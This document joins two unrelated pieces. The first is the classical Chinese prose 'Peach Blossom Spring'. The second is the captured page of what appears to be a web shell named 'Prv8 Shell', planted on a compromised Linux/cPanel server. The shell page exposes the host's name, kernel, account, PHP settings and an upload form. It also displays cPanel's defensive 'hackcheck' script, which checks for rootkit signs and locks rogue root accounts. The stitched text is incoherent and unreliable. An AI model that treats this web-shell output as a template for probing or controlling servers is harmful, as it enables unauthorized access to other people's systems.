晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/thread-self/root/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/scripts/hackcheck
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/hackcheck                       Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

use Cpanel::Rand                 ();
use Cpanel::FileUtils::TouchFile ();
use Cpanel::SafeDir::MK          ();

$| = 1;

my $tmpdir    = Cpanel::Rand::gettmpdir();    # audit case 46806 ok
my $is_hacked = '';
if ( -d $tmpdir ) {
    foreach my $num ( 0 .. 9 ) {
        Cpanel::FileUtils::TouchFile::touchfile("$tmpdir/$num");
        if ( !-f "$tmpdir/$num" ) {
            $is_hacked = "Could not create file $tmpdir/$num: $!";
            last;
        }
        elsif ( !unlink("$tmpdir/$num") ) {
            $is_hacked = "Could not remove file $tmpdir/$num: $!";
            last;
        }
        Cpanel::SafeDir::MK::safemkdir("$tmpdir/$num");
        if ( !-d "$tmpdir/$num" ) {
            $is_hacked = "Could not create directory $tmpdir/$num: $!";
            last;
        }
        elsif ( !rmdir("$tmpdir/$num") ) {
            $is_hacked = "Could not remove directory $tmpdir/$num: $!";
            last;
        }
    }
    if ( !$is_hacked ) {
        if ( !rmdir($tmpdir) ) {
            $is_hacked = "Could not remove directory $tmpdir: $!";
        }
    }
}
else {    # Can't make random directory in /tmp
    $is_hacked = "Failed to create directory $tmpdir: $!";
}

my $msg = <<"EOM";
Attempts to create new directories or files whose filenames begin with numbers have failed.
This is indicative of a root compromise of the server.

The exact error encountered was:

$is_hacked

EOM

if ($is_hacked) {
    print "[hackcheck] Possible rootkit detected\n$msg";

    require Cpanel::Notify;
    Cpanel::Notify::notification_class(
        'class'            => 'Check::Hack',
        'application'      => 'Check::Hack',
        'constructor_args' => [
            'origin' => 'hackcheck',
            'reason' => $is_hacked
        ]
    );
}

exit if -e '/etc/disablehackcheck';

foreach my $account (qw(xfs daemon)) {
    my @pwnam = getpwnam($account);
    next if !$pwnam[0];
    if ( $pwnam[1] !~ m{^[\!\*]} ) {
        system( "/usr/bin/passwd", "-l", $account );
    }
}

my ( $user, $uid );
open( my $passwd, '<', "/etc/passwd" );
while (<$passwd>) {
    next if (m/^\#/);
    ( $user, undef, $uid, undef ) = split( /:/, $_, 3 );
    next if ( !defined $uid );
    if ( $uid == 0 && $user ne "root" && $user ne "toor" ) {
        system( '/usr/bin/passwd', '-l', $user );
        print "[hackcheck] $user has a uid 0 account (root access).\n";

        require Cpanel::Notify;
        Cpanel::Notify::notification_class(
            'class'            => 'Check::Hack',
            'application'      => 'Check::Hack',
            'constructor_args' => [
                'origin'          => 'hackcheck',
                'suspicious_user' => $user
            ]
        );
    }
}
close($passwd);

haha - 2025